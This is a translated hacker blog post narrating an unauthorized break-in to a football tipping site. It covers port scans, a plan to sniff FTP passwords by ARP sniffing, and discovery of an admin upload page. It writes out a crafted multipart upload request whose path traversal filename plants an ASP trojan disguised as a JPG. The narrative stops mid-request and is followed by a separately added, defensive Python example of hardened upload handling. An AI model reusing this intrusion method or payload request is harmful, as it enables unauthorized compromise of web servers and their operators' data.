A true invasion: penetrating a football recommendation site

xiaoxiao2021-03-06  16


Source: http://www.17nc.com/

Due to some reason, we have to penetrate a football recommendation site, www.******.com. The first step, of course, is reconnaissance. I sweep it with a scanner to see what services it runs. Ports 21, 80 and 554 are open. FTP is Serv-U, IIS is 6.0, and there is 554; hey, I forgot what this service is. I only know that it can be overflowed, so I try it. Failure!

There is no other way, so I come back to his site and look everywhere for a loophole or an injection point. I look for a very long time and can't find one; he is too functional. I use the Guilin veterans to check how many domain names, or sites, are bound to his server. Sixteen separate ones. Now I know what I want to do: find a relatively weak one to get in through, then hit our goal. Unfortunately, they are all the same kind of football recommendation site. They were all designed for them by full-scale companies, their program security is not bad, and I basically can't find anything that can be used.

I can only use the most despicable trick: sniffing its FTP password with Arpsniff. As for the principle, I will not say more here; if you want to know, you can go online and read related articles. The most successful example is the "danger of the external black mainframe" written by the small road. To sniff, you must get into a machine on their gateway, and it is best if it has 3389 open. I sweep their network segment, 61.143.***.254, with SuperScan 3.0. Unfortunately, basically everything has a firewall, hehe. I am afraid of firewalls. But as the saying goes, the magic is one foot, the road is high, and naturally there is a way around it: look for port 21, port 3389 and port 80 open. I sweep and sweep. I am almost desperate: the network segment doesn't have many hosts, and a lot of them are Linux systems. Helpless!

Of course, the process of finding a vulnerable host is long, and I encountered a lot of failures. I will only say that, using the Guilin veterans, I find that IP 61.143.***.121 has 5 sites (our target IP is 61.143.***.108). I try each one, looking for a SQL injection point. Depressing: almost all static HTM files. Just when I am desperate, I try adding /admin after the URL. http://www.xxx.com/admin returns a 403 error, hehe. That indicates this folder is generally the place where the site management logs in. From experience, I try whether there is an upload page: http://www.xxx.com/admin/upload.asp. Hehe, there is hope:

    Microsoft VBScript runtime error '800A01B6'
    Object doesn't support this property or method: 'form'
    /admin/upload.asp, line 20

This shows the file is there. But this cannot be the page he submits from. So I try Upload.htm, and there is a cute upload page.

See if there is any upload loophole! Opening the source code, I discover:

Hey. He is dead. The upload path is defined: the classic upload vulnerability! Not far from success. Now it is the old routine: capture the packet, edit it, and submit it with NC.

Here are the contents of the packet:

    POST /Admin/upload1.asp HTTP/1.1
    Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
    Referer: http://www.***.com/admin/upload1.htm
    Accept-Language: zh-cn
    Content-Type: multipart/form-data; boundary=---------------------------7D4251A110258
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)
    Host: www.haotin.com
    Content-Length: 664
    Connection: Keep-Alive
    Cache-Control: no-cache
    Cookie: flux_stat_user=0.18235000 1095404136621813289; ASPSESSIONIDQSBQTDSA=CODBCEJAHFBAFAGNKBPONJKO

    -----------------------------7D4251A110258
    Content-Disposition: form-data; name="filepath"

    ../TT90_Music_PIC/B.ASP    // I added B.ASP Remember ASP ASP
    -----------------------------7D4251A110258
    Content-Disposition: form-data; name="ACT"

    UPLOAD
    -----------------------------7D4251A110258
    Content-Disposition: form-data; name="file"; filename="c:/documents and settings/support_388945a0/desktop/S/ASP Trojan Collection/iFOX007V1.10/asp.jpg"    // This is changed to a file suffix that he allows to be uploaded
    Content-Type: text/html
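The request above succeeds because the destination path arrives from the client in the "filepath" form field. The following Python is an added example, not code from the original post or from the site (whose ASP source is not shown). It contrasts a simplified model of a handler that trusts that field with a hardened one that chooses the destination itself; `UPLOAD_ROOT`, `ALLOWED_EXT` and the function names are assumptions made for illustration.

```python
import os
import posixpath
import re
import secrets

UPLOAD_ROOT = "/srv/site/uploads"   # assumed: a directory served as static files only
ALLOWED_EXT = {".jpg", ".jpeg", ".gif", ".png"}   # assumed: image-only upload form


class UploadRejected(ValueError):
    """Raised when an upload request must be refused."""


def trusting_target(fields):
    # Simplified model (an assumption; the site's ASP is not on the page) of a
    # handler that builds the destination from the posted "filepath" field.
    return posixpath.normpath(posixpath.join(UPLOAD_ROOT, fields["filepath"]))


def hardened_target(fields, client_filename):
    # 1. The destination is the server's choice: a posted path is refused,
    #    never merged into the stored name.
    if fields.get("filepath"):
        raise UploadRejected("client-supplied destination path")
    # 2. Keep only the last component of the client's name; drop directories.
    base = re.split(r"[\\/]", client_filename)[-1]
    if not base or any(ord(ch) < 32 for ch in base):
        raise UploadRejected("empty name or control character in name")
    # 3. Allow-list the extension. The part's Content-Type header is also
    #    client-controlled and is deliberately not consulted.
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED_EXT:
        raise UploadRejected("extension not allowed: %r" % ext)
    # 4. Store under a server-generated name inside UPLOAD_ROOT.
    return posixpath.join(UPLOAD_ROOT, secrets.token_hex(16) + ext)


# Constructed request data, using the field values shown in the post.
POSTED = {"filepath": "../TT90_Music_PIC/B.ASP", "ACT": "UPLOAD"}

if __name__ == "__main__":
    print(trusting_target(POSTED))   # resolves outside UPLOAD_ROOT
    try:
        hardened_target(POSTED, "asp.jpg")
    except UploadRejected as exc:
        print("rejected:", exc)
    print(hardened_target({"ACT": "UPLOAD"}, "C:\\photos\\team.JPG"))
```

The upload directory should additionally have script execution disabled in the web server, so that a file which slips past these checks is still served as static content.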